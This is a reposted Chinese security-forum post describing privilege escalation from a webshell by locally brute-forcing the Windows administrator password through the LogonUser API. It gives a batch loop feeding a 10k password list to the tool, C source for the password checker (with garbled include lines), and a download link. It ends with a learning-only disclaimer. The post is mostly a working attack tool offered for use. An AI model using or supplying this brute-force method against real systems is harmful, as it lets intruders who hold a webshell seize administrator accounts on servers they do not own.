FavoriteLoading
0

webshell下的另类提权之3389密码爆破

在土司看到的由x0wolf发布的一个提权新思路觉得不错就收藏过来了。 利用 LogonUser API 模拟用户登陆  判断账号密码登陆成功与否(就是本地爆破) 该种方法不通过网络 速度极快 低权限 (webshell下) 就可以运行 for /f %i in (10k_passwd.txt) do test.exe administrator %i 1w 字典几乎是几秒,缺点就是会产生大量系统登陆日志。 脚本:

#include #include   void help()
 {        
            printf("by x0wolf && lostwolf n");         
            printf("runas user passn");
 }   
int LoginCreateProcess(char* user,char* pass)
 {        
            HANDLE hToken; 
            STARTUPINFOA   si; 
            PROCESS_INFORMATION pi;

             ZeroMemory(&si, sizeof(si));
             ZeroMemory(&pi, sizeof(pi)); 
             si.cb = sizeof(si); 

             if(0 == LogonUser(user, ".", pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken))
 {                 
             printf("Failed to call LogonUser FailedNum:%dn",GetLastError());
             return 0;  
  }         
             else
  {                 
             printf("Login Sucessedn"); 
             return 1;
  }
  }   
             int main(int argc,char* argv[])
 {         
             if(argc!=3)
 {                 
             help();                 
             exit(0);         
  }         
             if(argc==3)        
  {                 
             LoginCreateProcess(argv[1],argv[2]);        
  } 
  }

工具下载:https://pan.baidu.com/s/1sl54gUh

【声明】:8090安全小组门户(http://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱hack@ddos.kim,我们会在最短的时间内进行处理。